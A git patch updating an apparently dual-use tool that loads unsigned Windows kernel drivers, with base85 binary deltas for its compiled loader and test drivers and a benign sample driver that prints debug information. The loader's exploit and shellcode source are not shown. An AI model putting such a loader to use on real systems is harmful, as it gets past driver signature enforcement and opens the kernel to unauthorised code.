From 9db2618d9e010213f73cea66987ba674ea1c06ea Mon Sep 17 00:00:00 2001 From: hfiref0x Date: Thu, 20 Apr 2017 16:52:12 +0700 Subject: [PATCH] v 1.1.1 Update for Windows 10rs2 (15063) --- Compiled/Furutaka.exe | Bin 97792 -> 99328 bytes Compiled/dummy.sys | Bin 2560 -> 3072 bytes Compiled/dummy2.sys | Bin 4096 -> 4608 bytes Source/DummyDrv/dummy.sln | 2 +- Source/DummyDrv/dummy/dummy.vcxproj | 138 -------------------- Source/DummyDrv/dummy/main.c | 72 +++++++---- Source/DummyDrv2/dummy.sln | 2 +- Source/DummyDrv2/dummy/dummy.vcxproj | 138 -------------------- Source/DummyDrv2/dummy/main.c | 115 +++++++++-------- Source/DummyDrv2/dummy/main.h | 43 +------ Source/Furutaka/Furutaka.vcxproj | 12 +- Source/Furutaka/global.h | 4 +- Source/Furutaka/main.c | 135 +++++++++++++------- Source/Furutaka/resource.rc | Bin 5702 -> 5702 bytes Source/Furutaka/shellcode.h | 180 ++++++++++++++++++++++----- TDL.sha256 | 30 ++--- 16 files changed, 379 insertions(+), 492 deletions(-) 
diff --git a/Compiled/Furutaka.exe b/Compiled/Furutaka.exe index 348832ed0a1045401158f57986483f541c339c24..0e7377b10f4a3e72fce606143e3176e66b51c816 100644 GIT binary patch delta 10810 zcmeHNe|!|xwZAi)%?}{#0+}S6K(YxN5=aPv1lS1F-LMN2+(3}hybNXOqSD+4tk~ zdH=jO`P@C{o_p@O_ndp~xo7UA=__N?_SlwBZ1Jq*u8Yf<{`9kKHk2REm>mQUr%~Gq zl#yJnsUNi%#y;%hn1R)7RcbbjFVK6PtYd5y;X%fhnZeh>*h9SDNT8QvR%L`?EFWB> z9N?x+b4&-(j6%aeX!K)ctfsJj)r}1|GS-xbmP(WfC^MBpK6ktqSk&XdpoMi|Zf!^m ztx2p^?&fnBu8U#?3hti5?|W}qwNW3o4Mdvgtte5C1FVJh8|!ZdO;accWF!=;Q;zYO zL!ge<>mE)q-Ik?T4Z#Ov9?yO)QNW{A=&URUYRh9RQAlLwa2_=QI{29&Ot z0Dr@T_65dz&esRsM1NPE^9JY2>Vro;(p!rcITt&ZIG2{oPd)s#s)}1bb{N1T8O`ef zio3)>vlWx|NP-E3;?r&^?-y#NFwjz)0?gg#4+hxn6)!7?! zPd1|#Yq|9MZg;2%v~Ksu)FgJh`^y+B3slE^vPJFV2mB`@GYBQTCfTCEro z3Qb2b4^i^i9Afhk)3#BHBcbf3z@{Woa@ic+j!O6hnt^))HKK-y-Htrg$_-E*k!E`Y zDGJN;ch-g$k~>iMy{TkyDbcY8gurIyPYJnW>#x!*nnH7e34S#TCivu%surI<8%Hi8 z3%$z3A-T5V(_w8b-qPv;ZPOaRESJ6_Wj)d{uUC24Y%kE*h{xnLWx60ivkN$3$~}r_#KGVsp^6?fL|W3_Nc;#j|;= z_=G6crLGpGm>h}`VxYkW_ZDkJsk}%PHjrtWzc6jv6OSqH(|7G}W`HWYTb$Ax;ceSu z%4CY!D)?N1@zj9WxxR(MXpq8aUgH z{g;Q-8$0NT@fv>bbq3ZqyLlYoQ5gfjN8fgAmf<#m?G> zIe>23?TY8U0eECNZ`$4Cg?IK9pY{eU8eeI33k4<|6s4BNFFmp|qeAi>r+p9+VA|ci zH>_c=uHi*!xHqif0cgnnPQ$=;VFjHR$Zw#BDrAs1(Xx%llwDG7B{s-q1eUN(LMg;4 z3s!AOd}M^-=s-4b4BFuHsbL%Jj}6-Zu@E+R7B$#l$=}%^qQF12z(3c2(1iaJ3w*BW zMVg9GrcM>&poA89Nx4cl9T8PT&()PXZp7*6K`gGUAaix%)IwM+8`N&VSEHB6Rr;+Z z{`em&C`xZsz}NB-49X2XwA|WK?>?}9aEZ_P;Kj7Y`@?J8{he!k<7cY6b(W!)u{WWl z$sff2#!8+T)HtOiO527vkiyF}g^}U;NaKuEEokMiw_(5$_@ITTE8o``EF$% z=*Mv+zd-pgC0!1TEFB`(tc4mrO1)~yLG5U?GWZCcC92?=5?(Sp6l$F9mbKg{4hn_J zAn$A`oeYsPuBjB{d?IH@lPL`hB@uZj9Xi9fCfhrIu`p+X0pGPEiBbD(+qEyRyic&6{-6P@Dkc5KO zIH9CthnVQo$cG$UhnP>PmjOFgBZ&c#-+GxGe&Z62K>Us&TIOXxAuqG-T!h_dmt8`%x$Oi!ZZ z2b)kanPJN&4I5F`WHO5_rV;a6OlC)`X+&8o>TRgEp&mp%hir^} zS5KRKW+c@-h-MJYV6uYAih2?1MW{Pacc5O0Iz{xISk$u*Vj7W2rp(18kpeJpi}+uk zpzoi~@Vh7YqQkMh%z=5`hI#2H%@cp7)%GBvkX{z0Dw`<%RWuwAJ(eEf0Q-~Vn_K>@ z`XZc%h!g97JaqVzsPye1@hyo6bV&!LH$o|J>EhEa>4UzR16yDeVtc3%e0_NXv;~NM 
zp){f;4bWyFUW8&nLnw`8C1=hRNZyK1_x%+4n`7~!B}<)EqP)x2f_D#5 zX%iAgZCpWp=>4w-fk~8RW#6P671Fr^B_tG$erO_vxJ_13THNH3E4I_vn?&ijDm*t) zDM>E8W*(AxY+SsLX+dH+&XmxLeX3e6b@k1_*&f(sYsDE?e8jouYGz`p@N7P*8A7tq z=+HYoL7letDNiR`c~gpVJUN|ze7f>+vXu)ei7Dy6ZPc!w!^-SYITHnwbD)${{^+rD{%-8GQDg519zFI)s1J@k9<`{k zWnt5FxNgW0JvP}((>`Z{;!GXo+lf9`>iWs}L0!wfHQt&l#@hwXE5_4S@P}trwIhV+ zqY5*?K4AA_@N{kDU!a>Pog%H5`^ero(R08Rg(|G2Ib4LjN2|hq;9;Fjn!P_l-APKr zYr&d_YO^|Ea9Kzpd-Irtw8B>Bk!LN%xD>uOl}>$hCALF)@sZH%VdxZWG`l8+UC%~+ zj)&maaz&-Lw6U^bxc>S{+3#e^evLKY*{^iwq$t}h>8Y1+7d7Kx!!S71d^DUbfUlHJ z9ko*Von=9G8oe_^y#!G@tO`k}g{@F7y{TDXLY`8PmO3mR4VZ;V6_(^Fm1#n5cdlm8 z4V3w9>FH=9zm$bb&``_&dn%-ERk)m|+?STOrijMyUsN07JyP#J^3>)p5c=PvWLg&P zBw%v&^u?i)hzW-MF*M~P+FtP5QVd0rqYciF{dV>dY-)nP0>oy=9Zw65E*aTUB_lm~ zNjzETgAXY{CVsqxhQ_O4tSVR`r})I+7CkkNdTCoUvaiQb*PZBkwwq#1;89y^Sg{LJ zlpm$%@V_3XJe!`rnj}$(sL{5aNZW2TglTSoZPx)j+V$T<-QTBq0XWCfu(EL`hH9p_ zg+D-leG9@0p$mUfRafcMUo2N9kG8Cyf)quRUUf>}sKPfnglo=-8xyS7>l)z|3HL>N z36+ihh|mc@qJ&BiilMqd_28v4kFt2H3z$_E?#NYsJ9_fG5?at8m_7iLC?}4_sUVuf z*ZMNF6ezSgUT>dG4RYdUt=;vSzFJ?OA$w!BVsexTW5#itm4#z6`CU~?{g~IZ&>gt+>N8633JinIk=^Fsch_fy?Q?6l=O?I9Oab z^F2t^E9^8sHvgFB2d$9doHJZCWNKH%-_<>g^!ui=Q-mH(R8=|529bq5ylF6o4JA@OS1 zT-w06kf;d--X&+pJuF$a$k}0GJeC!izxGNaoXEoX-JNiSCM;B@@<4XdvU@Wb3yk@+ z3NAi)Aj(23;&CV+;#6S^II#Ai>dWxQbS&2}v}qyhDWpK;m1!KKDm_ zQHkm9Oblh0&?XAM>x~*QO}x1ulMK zigIH?5ucx;Cz7&MVB`cK^7p0fGaE;wK zQta$Bd%x^d)z2FF&kl;6N6cqGQ1(sCnUR2YamK;M4RB7}A6_Mp_1&prz-?BA64Y>g zHkt6EFpk^ma6L~@G73v8elnXntiT1+m$-^F-cMD3m$mw!W0C0p*otdA3IX>f5f@J8 z9|BQ@I<0zmZ$bpC}{A zo)~L{$|02eEJ8%jmoe86U2|gccDl-RAQ6VT4ydaNkBvfisr@3v7UQxqNP(?JbG|L3 zl&2?6P5T}g)Na4ZZ+;d695<|7e(9W^2aD$MtLG}7qHC_jTFsX3+xoBgR#0v@ zqQ2J;#Ds4Vp90bcgc-mcD3vHRC>KF%0c=IFqO_rGLJ6Yuq6k;FpDkL%aaXs`n$pB` z=aqdWhq{KTnbO`F9HYrkQdh2yf7A56c- zZ~&|I=JZ?mqa8|_eO7y&#q!tc11htMQoF@ ze)c2R5f?p!oG!MSdD)Hdy>+YsoHs${24EXe>OrpqZ6m7%*E;;&jJ8$4iAI#wpfuoj zm6A2fqNFV_mrur6R(360#HO(P|GqrN+6^u_A-#}IhLAi6D`JySO7J_GO()|i@2<^H 
zw6fb#CoYus4=TRqri)S+Ud;7`J+RDNA@z!Z+Eh^4=h0nR(q2QQk=xeB#zWG2Bi#{rk4TT1L|k+W?%>{RHT%;x7Ry$=L(wkzE2e#$ zURBLxpPPJmf53gDqX_NYs4PR8f@#gk6Adp@x{^oC$XSj!)z`I`LXWh|)&yn|kdzgr zM{PR+ad9z}^5ItCPW2>iL|O=2fwOM$5<2Z*K@W0cTy2fPyC&`pbR#?WRIOUKNW6LN zOmUT=&n0cCbjm*^6Fb${M7b?&><`J<{(sYL{cA{;&=fZHPXQ_Gc95Mt(mV8SA$szw zi;7j3^a5Gk4I{6Ke8qvGtCu@xd{h4zefx2cQlf6*%7}$?a3YEM?_8OR;)B?gmX_SG z(jhvdS61Vc?!`!W6yL(1DUNHK9Rb~4w5L-OY;!Bd)&Jm2gjS{~; z-1Xb_8nh9O`dB8!F$-7AhW01)#`PGBVk%)cOvMUU&&r5p8TgbL-|&4Fv#O5u;K0ot z#n=j6ZdBdJEaQw!;Fhqs;GmEe_)V5Qp4l%{vE(z0+0c{KET&-vYqc zuGLLxjJ>1_r}pUj6@6GdW?zL!yqGb_WDUM6g<5jsSTgqvO{OlU#!$rTTGbf!0nfa^ z>c-+K0;LE!u{Md5&ujICHtY(b!RFK+UB9wVEQ`PJA|~+yjs&AsJQ>H2ONUb!iibf$$V)m;5a{-ngPK^(?LAHkQWS%7#X)Kx?a+y^ggNF!s?z#!5DXHIA-Z#>TTG zq$x>N2`s4u__gLbxZC`t>0FtzW@+XK_z4Ha=(4CAzS}cL`T5e^RGoUP6#qAbk4(ft z@HfiaOCR;k4ihHMK@x^yog0Q+EYD)6@Rh{8{WkpQ&t9C(m6&!b-Yz50NziH+Vz)%` z-AN}Q_}ZfQL>$ALz!&{IFe(23^C&XN|Mfg-I2mCuk800e{zU9^H^uWlinkPZSB`)~ z11ER`${FC%fipU&Qn1~D;FyQlMQ{(wOyC5Mqj-Qv1xqc6u0ed;1UkW=qdWv0G0ry- z7^4Fq1;QA_qPM_AumGhWIKf*`=wI9ju17Hgj}ArAF^po_k5FpBL-0YA2H*sLi?Z!j z_yr*!A-+6>27>2NwgHchITXJlaf)Ep1jbH*hoB9&?-zg*oP{zBp~V6CG(yd2;L#z5 zLQm@?Y+cX^nthWIEl_Ehf`85{#_WLC0NybTG~i8u!x33_0dEC-2$3ZOybbU*l+-$$ z2!KuaU!c*z2|kZ96F9+U{EJT>@a=$?P>O(?@h0d-)DnUF=lpLz-=fkz*_)!qC5<|4e(i%M}Y?cJ5gGJTM_lvqwF9$-~p5#;5~rp zbMb|y7urx*bf6rrYk$CdtAR@dNaU5_Yo5yLLbo9lCc{sE5PBLSHHbN;{BeyZfkW8k y*v?q4ebQPZ$4zdZy3P;a?^wUPV?DQM_(;d&;^V9ax}$6AQ$%}mRfKI z1}xLdt*NKaQpH!=@+>NS#RefzOB0|bJP=c4wX`Zm7taoY5)m;_@V?)^_f8n->wj;( zKi+z?)|tJ}KKtym&p!L?z3;ujO$otk#Y)^v$j6QSR>)P7;8uYUmIha1bvV|uYp;3S=<=G-oy_Y zrcJA#3StTxEd!ykKMP~t(w4>t{10HUaTuvbD@L2aONFBG4+4w%*%|9BZPvKeC9$+B zv5`Lw?xq-4py2K;ZCTaw5O7t|T|m;H@N#}x$R7$d8L7R7=f!=@?QzA=#s9qUg?z?b zdmxP6wf#SnN8DvP1R&5osxC5sOo z^GNT{bIf(jcPwzruWh-mDB`;FVjNf`W9mwP^21_yqXmn4By$P~uJSWZ>8eNi!WmxH z>j^hn?e5T3#kAqu35=Oij4$2Jm^-{M(;Q*N;qlj0ODbA&!}owKdF6 zS)?WUzJ(=T`#YBSGd$(D9#T)P$yQf!S)_Nxk^xb!vzYSj%xB8qfMLdXb7Fdl&lxTd z<#`qy)G`a5*+Dw9!q&^8w04I_uFX4;0#>JV+?3BBPbwYd3_oab?1KwH{ya;BVM&j) 
zl3z?LHT@PUiIT@^7dIX;ZAjyjht>w1VQ;!9Ij#0?d%Ze|a8I~NREc7@y_jt?V3tO; zN0G`XV$%eMx|$-llg|+2{!BU^DYLpqC{QILh|G_R#EjeuvlQrGJbT}0(TYMn&!ZHQ(>4_aiEbmzJ{ef zQsRrfD}##pc5r&C8m)H!XvaPlq{Cfy3YX%P7&@Ye@?5K3F&~A7SZcQqqtZ^R zO$`!nS}Rq!+iF+gR%?)8=!)V`Rm?pIpJKOhEv6{=iIPl_L@YlR`6eH5-C;zU0Ha9c zScF(~^UprdG0(9;ly_Ra->6|}8_kuBR!GyrQV?$KD*sFjZ?*Q2{lhB|V5Gkg6dj>= z6hi9h4{pE0YKtr%MXGm-8#_%K#toqf+pSvym|1?pBY88IiBkMn3NoT3dPT`?Q_K&* zE_EBvm^Sn$fE?a!?Ij&#S5OSUX+5RlbwS+rSE@p zL22nvv>Q(eB-RC^(a8bD6LrP;`JyDttvW|lCS~iS<38?7ntrRImP>TtP)9LeM>bWB zUV(+3Qd2z~{0bt2=9`hrUxHIM=R+NRE9WtRwo)0hm0r+jE8PgPw3SMAEBnyHR_0W* zw43*WQ0wHUi!#QPzo(izoaL)p9P|%W14dPL>({#O6hwGaQe_}|QRW3B1)4%vp&}{N zteF2+L5o5m(n@sE0n8=(5M8N1!|5pmign~$N9YR3HMN8G)lvZL8q!Mc!{9L)$QBVYrzTjTCckxu&-bdbgs|P_yv& zu67S7IQy(Iw(;1LLZsjU6FWS=t@$Hu>-+^`Qo~K;UQw^g5VB)ZfHG;`+k?jr6q%4 zq@`a`0+dN@aQHj!pz`L}TTIQ!wzuqtePRiGOpJq%X-r{J0EdddWlxIo4ckA+S0CjY z?vU?@BNw${SLvc04ni4IiXh6*saUEbXiB-O&6Mg6w3$+Bx0zBM+d$X_!Y=eX(eFgR z7yVxJ`_S)0zaRa6F%&Vh{tCkCq(7Ka4Wd+=B8D9)Qf+3~k!jjno9hcZa!q?`^ENs1 zG!-Od3~^l-WyMHaPV}Z@&)=;=z>hq3L5mHxI_ayr1{X%o*$2tPh@7C4#}AU7(`fw*pKI)CgY-$b$dOYZi;^DX zB`v^v(5I;Gk&r9MtwL+8HpBug<@ocX>2ig&fue3hG+`onyaE?-NZrVKl&C1{WuPz; zN3J_enG9KP@nFv5D>HIO&RjxVRBwCL7*})gA-**u$B@fAGHkhxlj+v3wusWaphvFT zM60b9rFRtb`pG;#v-IxlQetS0)>^}mt|QNUrYLUd@VROP((q2}HpJiZBaV*SnTaXp zb(3gY5k%%zyI#xAr%CsI#@A+Agm*^qpJwI=vn%Zs~2s`~?axkJRt@J=UOT?_cbY6v{!(v<&L&{Zxb^XDQ}AV3kf`*&M~3gwdKD z?6-A{TpjvDYB3K6|VAIN=!DY3EjGXvXQKUuIW{+GmgsKe5Z(UtAwaLqvKcoCe zByPCsdBeq0*?bE3?(8$r` z)OUcKbR#0Z@n_fw=FA{qa`v7Zg3jCMXdxq#c9w1y95xF}c@Qji!S8X^&eD@0!FIr7 z_IY@mZll#DV_yURCU?~Q9>|Csicq9UKGr}>qgGB(%nWkMPu#ej9eAZ6YPU0br9Ysl zn=tikHyIdZ?>22?yUY3V(PM>;#r%h(bC!`LwE|RcoJcp$1!1ZO;Kuy~c&yiVp&vS@ zIsiE1Xj$2K4NGmLs*DeAnXC{w`8P#zR!#lRVxF3pwd~>)((!GF^o?RZT|~I*hj{G7 zX}zHmj!Jkce}PchNOxBi`svL=AB9jXwE@GPu-{rtMHgyLzty6c7mVl6=9S%*P6yfv zreAC?Rj(8IF@i-(6jNeAU`ON={+oidi36DJ zM2X^bgsvo*)}JN|$u(&>s{J0-kzHP`QugB6C#7(9T%FX*mlcX}?$D=vS7Dy8q>}d* 
zK6ooR;d!{zehWWYSXt(@dNlnUQm-R4kkpdyYwLI$50-AF>+6rZK8*`qOxgTAglK^~ssi#y_TmUQ_Xp-!966`m;P zWujMitDk&Cj!V@XtYmZS%VGkK2*s*eY?}qxRqXDS0=36FA6ZYit-U-hM_viA)k~@X(KI(sJR&OrA4&@~GvRume5b!n+#q4vYfov`p@uJSXQqRM{6>)5NZ> z6yMifigK}4xOhnHI+Aks0zW=^Y;_jK#p*+?k0USOoylDpWPMkr7>nD>I*EIssEkbqE%prv-)$>+^zRTCd6g~)9vUhk|6@`YE>|grIuTQhE!3Bc zM+tn*5fls`@&nU)40rJFO#A=SXW^Tzcd|QYtj0j z>hP~R?9pL|4tMCVLZ7G2Vr(aZ0R8ss@R$zY*Wu?nWZL`y8>I`{stOGjxHMTeSsF>F`Y*?$F^6boi7G zz1(nHMj%`7X>(y{UEOHE0ojOtt97_phtKP9rw$M6@U#xk>+qTm?K&K#!*~q_*d_fS z&gigLhkJDRvJSWCFsMVH4yWh>>-D~-Ed8}*mO1-FHI`&PdExF`tc8+C`q=kCqXM!o2@*+=sejpOzjYpG@mXn6}^)l64-m^c%EtqOr%J$PLA?HSKz58UurqrxB3_F#u4i$!9k7 zx4>ql53bVOzfJol8~s?ywrSrrYcGFtg#7f z6#rer@G3iFl^_%t1!k;3Fit^5ghsn9AkLV6R#rSqI+4&H-zU_Ib}rmk7Tn4Rrg?czG1O;JjO{x1>XBM8A(Kgd$QuOc~ zwO zmlx)z!deDsO&#Ks?r zLyltX1Uv+tsLtL8PH-{WCE#Abwh;b*e7c;nQC~=o^ z9S}Ss;4-va;DII}U1;g(90qhdaF)P5fOpPh>^9(Dzzt{(z}o2<5qKwH z7g`f=8=~D>v=zWn`?3>gTYytBRDvkD9STu2taq_E*7n%m)C$9WG`_Gp58U72-5dho( 
diff --git a/Compiled/dummy.sys b/Compiled/dummy.sys index 8a043a68e950b437ff81359a94758e93817e7abe..a28022740c595794f45c407558b29e43c4d26b20 100644 GIT binary patch literal 3072 zcmeHJO-vI}5FQFt1o??c4<3vU0*Zkk0w*I$NlVxbMJh#O^q@<-LPNV--);pwcp=fm ziXq&H7xf~EdNYK0Fc>@#Es=|ViNEnE2QMagTEDm5LJ=?~o=~QlnQ!OK%$ql}>D#W; zMNwdL={B9_bcJu0JzI~OWv@&XH$y#rB$CAi+tl{gD4nx>nqPh~u* zv8cxU-60m&BWgowX>qladNN)2u#q=UD1lu>ZgeBdnN>){e3>T7qjPZ0 z1ZCCw=M{?`KGj52Ya>T6B2@DCgfiCT{Uu`qk0_=>)FSN8+3X?b_<4z>hD65Cu8Cn0 zJwOB2kQaXPF}YV5Pl}hN5iI&x1kNEw)R*(P4YxoC%9=ApRy+ErqnGjC=90@@KrXk> z?QU|3>2K4&(g94f=rI0E#DBy#{dXPkhNRIYCZ#+jpDZgdR=8wYmNZuS9gUDuyDiVs zM;JV>Af?nB%kxrzG0%S7gYY^86-Ye~q-HJ899I10Y_@!Qe)LEAP!GIry|Ap*^=tEZ z#iaaa)@PXZBI0W+K#Kq^0G$HV0rUw_1u!DO9)NKHDgf>Zumj*R0QP+iWqFQc$L3jS z^eH44*nRiFy{s7Y&OmiG&(qiV0KkN;2g1^XNsDw`(RJvCZ;Q zs$sArtR|LZwKa)@hzwF2h47Q973P1`Jz(7QaZ4@Nm26m_Xv>%Zn__R?k{G@fB zKI(#9UT4q7`><0tJUTb=kdb@y=yY1bYR3lqX7isQjRwIw4M8%TO`#YiNp;TGsdlKQ zFUh&8nKHi+YpoeFL_-&I?juRuQ5E0~=uhvnse-O}$ewAB7->jMlxWx`>#O@a1ETwd gL1Ud&j-bQ-zWyMOYKYWK-5BIrtU(HAm)IY0i_fe7#?kQWZA%Il4l4J>VVSop!7B<9Ra0b`kC067&aTQ zoMq$$8eIs)1_GM}+1@iwG+>{^!C5c-;QxQ0Ue-7N|Nr;s4dt3cAD`$k$CzkCbWV4q%~3gb)0C;y9X1gqE$Qqe0~0y3bNw-!kGbRY2P zKK);GB~a$|`7@}%BQ+-{Um>k%vIM6!6T_Lwp_~??3}?=0AUXaJh%GQtQA~-jmnXmC jQjy4G_D*$4%}K0utw>ESEy>K!3&|)-O-z~0!(9acyit+V 
diff --git a/Compiled/dummy2.sys b/Compiled/dummy2.sys index 959260ac79fe10d23e48cf7e1fed10ceb20622e6..0b1cc6d1befdd42a0b56870ea914ef3e66054d5c 100644 GIT binary patch literal 4608 zcmeHKU2GIp6h7VlSSn>J=_rXP1KB1JNnI=^7(>`PQ<;@5UA8SEHd(gYp&eOvm)U74 z#PE{^WF6LEd4Yrn;)B28!GvE428CE6C6GoF5D|z`G5EuSC?V?j-8(aM3oQ@$Ks4OV zx#!Gx&pG#;Gk5R3)3|sm6%$bj$g+qIfU_3h{hhnh7#=t2qj9un%*n|Iib5wRw{&S4 zF|DUM_1JPT9!n-uhS;u(dUsOPlA_$yEG|!VsI`@q6+XxHj)6x%IlsHRZ-|V(b9ko6 z$9>;`ch$Yw_ciAqa30a(T}*eh$ifXo9h*vM&FbrmT%D^lg&y>bC8_|z5@js_s$v2K zidfHN4^bJa;Sz%>41&!g+lY#22~=$(m)-t+6XE6;14L7~i1kjp`C?hsiMiMnd_j+hZ6>U98C145|^TL2-~rfoeQJ96N9;|jGig^RMxAXY~mS5e^mhdeWzhdrZ`=zq+ckhNg6U^uYW#c*HvGr>v zluVq0iV0((ZdAj38w5+(4XZJo6=a>oL3^7#W~qG)s)KN z-~@JOsQRD^P_%?spx$5H|N48>FO|F@G#B+t<*mE^1RFc?iMKuG`NK$su9P174%3(? z>jraCzmjX3rI@EIp^`_P@F|LE_`>E<#ccBhlc`s)u)!84EcGZen4ABDzl zk1VcXD-7jj-x9c~ha2xy*evy~F@;+rh00|FGvfifua;b&!iB%Fok*?sL}{H zH%2GJvKcz{)B-)_Hcg2dfd_BHU3&>LH9=$EC>lZd9^D%Me~iu@VP4mNDS0`NZESo=jx3Bu8WyxRG`GwUyELO<95=0W z3>UDBI9seq^iCh%xr)w=@CR#grDk;Diq;cLXdPlOC8d&vo=Ql#tlgq7>1xbShoXnQ z4LN#JB9$o^X8CZ)btCIqkE#cgnxSE?)wjBbzFR3fz&4Um+aA&=4&H`UA>$2W;X4lD zAK}_Tp|o)o)m}W!&YXE-_9@B?^O70CkNW}&{57vy-kwTm@sO5WHq0v~|KGGl^>!*r zhi`KDc89<3@PNbJ#68s&JYJr#ya7MH!bXW>!(f zVA;@^?(w^R?(=(FfvSh_Su`Hs5+Xhmz-NNOkOSZ=9C;o1hmL#%yrG(?4La<8Z-5d^ zzTf_n72x;1z~yVFaO~%WByzw-Y$cc_6kX)lYL122)$@-F9N9d`7)MS5VfQ0HjAuZR z-H$|mnE_H61;Xw}XDne46mi|m9t#Y=KicO(1CEy3J({eIX7`T38L9U2tU?{oqX+`VR(n1q>;)j)02r>wU=Ey{zdx-xc-9c delta 1276 zcmb7DU1%It6h1TA*~V-#J0VU}H^wgM#3Ty3vZWPc>4wb6gl=V(vYWG%7|v_d#!_Nq^a}y5gddWD|5;I@OO;3DR|Td>k=8dFh)i339uU96)nCG_U+NxC z!koF)v|G+Y;pzurqW4>fsz0US+wb{~!&f+*c0teJ_ z0Gv^-J{M;1O8sJIm|d4PiQmbrFSsER^H}O_UcvJ?XZ&;1`h=^;WHu4JGosYOzvF&f zW%cl+%#H@v=gs1brtElZV5ez6t-WV1{9MH?P3vnT{wq#!7FjsKC4ghx7$F_-XPR;V zK1E}IhBS=;)(m^GP!ceq7iYtc(O#o>?58XU>vc*4Hsoju&@<*)cW3in_Pw?2_-giM zuCAa{roH2aX>WJ9dd{2KsX)C{pPOTC zpG(@(&A&M>48;Pby={8HeyCw$kyY0`kXrhS^JFnQX%-6?-QL>L3W#QLa2l#~(^U)e zUek@ah0$1^gKod3RpGLnA!}E3$jbH(S>F!qd1Cj;<>lqdlehE=jRehI>_k(SK&&Oy 
z%@)L~eUk%7!#d#OD?T3c@q~{l*4MnTClVrQEd?XvofO%4J4J+bBwuWv4yEuNf&mf{ z3oePV%7XZUpySW{0l7bl@~uP~Bn3SN-0SPpz$3o?4)9PL(TK}W5WNX`hFw?ME2HvZ zp%e?073rzbcoi>o1PnaTTL8Rd!kZgi(=+a<=$e^xXGPbN8FyB6E#(c1t_^$Bf?;@^ ztDk;@Hrm5l!nBj_M{zt`H9vFRp67LzP&&74#TM=ie8ts+pjao(!l}_+Zdd - - Debug - Win32 - - - Release - Win32 - Debug x64 @@ -17,22 +9,6 @@ Release x64 - - Debug - ARM - - - Release - ARM - - - Debug - ARM64 - - - Release - ARM64 - {3D8146DE-8064-46C0-9E70-CEEC357B2290} @@ -45,22 +21,6 @@ 8.1 - - Windowsv6.3 - true - WindowsKernelModeDriver10.0 - Driver - KMDF - Universal - - - Windowsv6.3 - false - WindowsKernelModeDriver10.0 - Driver - KMDF - Universal - Windowsv6.3 true @@ -78,38 +38,6 @@ Universal true - - Windowsv6.3 - true - WindowsKernelModeDriver10.0 - Driver - KMDF - Universal - - - Windowsv6.3 - false - WindowsKernelModeDriver10.0 - Driver - KMDF - Universal - - - Windowsv6.3 - true - WindowsKernelModeDriver10.0 - Driver - KMDF - Universal - - - Windowsv6.3 - false - WindowsKernelModeDriver10.0 - Driver - KMDF - Universal - @@ -118,18 +46,6 @@ - - DbgengKernelDebugger - AllRules.ruleset - .\output\$(Platform)\$(Configuration)\ - .\output\$(Platform)\$(Configuration)\ - - - DbgengKernelDebugger - AllRules.ruleset - .\output\$(Platform)\$(Configuration)\ - .\output\$(Platform)\$(Configuration)\ - DbgengKernelDebugger AllRules.ruleset @@ -143,30 +59,6 @@ .\output\$(Platform)\$(Configuration)\ .\output\$(Platform)\$(Configuration)\ - - DbgengKernelDebugger - AllRules.ruleset - .\output\$(Platform)\$(Configuration)\ - .\output\$(Platform)\$(Configuration)\ - - - DbgengKernelDebugger - AllRules.ruleset - .\output\$(Platform)\$(Configuration)\ - .\output\$(Platform)\$(Configuration)\ - - - DbgengKernelDebugger - AllRules.ruleset - .\output\$(Platform)\$(Configuration)\ - .\output\$(Platform)\$(Configuration)\ - - - DbgengKernelDebugger - AllRules.ruleset - .\output\$(Platform)\$(Configuration)\ - .\output\$(Platform)\$(Configuration)\ - false 
@@ -192,36 +84,6 @@ false - - - false - - - - - false - - - - - false - - - - - false - - - - - false - - - - - false - - false diff --git a/Source/DummyDrv/dummy/main.c b/Source/DummyDrv/dummy/main.c index dade601..c3cd920 100644 --- a/Source/DummyDrv/dummy/main.c +++ b/Source/DummyDrv/dummy/main.c @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2016 +* (C) COPYRIGHT AUTHORS, 2016 - 2017 * * TITLE: MAIN.C * -* VERSION: 1.00 +* VERSION: 1.01 * -* DATE: 29 Jan 2016 +* DATE: 20 Apr 2017 * * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED 
@@ -29,35 +29,57 @@ DRIVER_INITIALIZE DriverEntry; * */ NTSTATUS DriverEntry( - _In_ struct _DRIVER_OBJECT *DriverObject, - _In_ PUNICODE_STRING RegistryPath - ) + _In_ struct _DRIVER_OBJECT *DriverObject, + _In_ PUNICODE_STRING RegistryPath +) { - LARGE_INTEGER tm; - PEPROCESS Process; + PEPROCESS Process; + KIRQL Irql; + PWSTR sIrql; - tm.QuadPart = -10000000; + /* This parameters are invalid due to nonstandard way of loading and should not be used. */ + UNREFERENCED_PARAMETER(DriverObject); + UNREFERENCED_PARAMETER(RegistryPath); - /* This parameters are invalid due to nonstandard way of loading and should not be used. */ - UNREFERENCED_PARAMETER(DriverObject); - UNREFERENCED_PARAMETER(RegistryPath); + DbgPrint("Hello from kernel mode, system range start is %p, code mapped at %p\n", MmSystemRangeStart, DriverEntry); - DbgPrint("Hello from kernel mode, system range start is %p, code mapped at %p", MmSystemRangeStart, DriverEntry); + Process = PsGetCurrentProcess(); + DbgPrint("I'm at %s, Process : %lu (%p)\n", + __FUNCTION__, + (ULONG)PsGetCurrentProcessId(), + Process); - Process = PsGetCurrentProcess(); + Irql = KeGetCurrentIrql(); - do { + switch (Irql) { - KeDelayExecutionThread(KernelMode, FALSE, &tm); - - DbgPrint("I'm at %s, Process : %lu (%p)", - __FUNCTION__, - (ULONG)PsGetCurrentProcessId(), - Process - ); + case PASSIVE_LEVEL: + sIrql = L"PASSIVE_LEVEL"; + break; + case APC_LEVEL: + sIrql = L"APC_LEVEL"; + break; + case DISPATCH_LEVEL: + sIrql = L"DISPATCH_LEVEL"; + break; + case CMCI_LEVEL: + sIrql = L"CMCI_LEVEL"; + break; + case CLOCK_LEVEL: + sIrql = L"CLOCK_LEVEL"; + break; + case IPI_LEVEL: + sIrql = L"IPI_LEVEL"; + break; + case HIGH_LEVEL: + sIrql = L"HIGH_LEVEL"; + break; + default: + sIrql = L"Unknown Value"; + break; + } + DbgPrint("KeGetCurrentIrql=%ws\n", sIrql); - } while (1); - - return STATUS_SUCCESS; + return STATUS_SUCCESS; } diff --git a/Source/DummyDrv2/dummy.sln b/Source/DummyDrv2/dummy.sln index 28627ee..6c35f1c 100644 
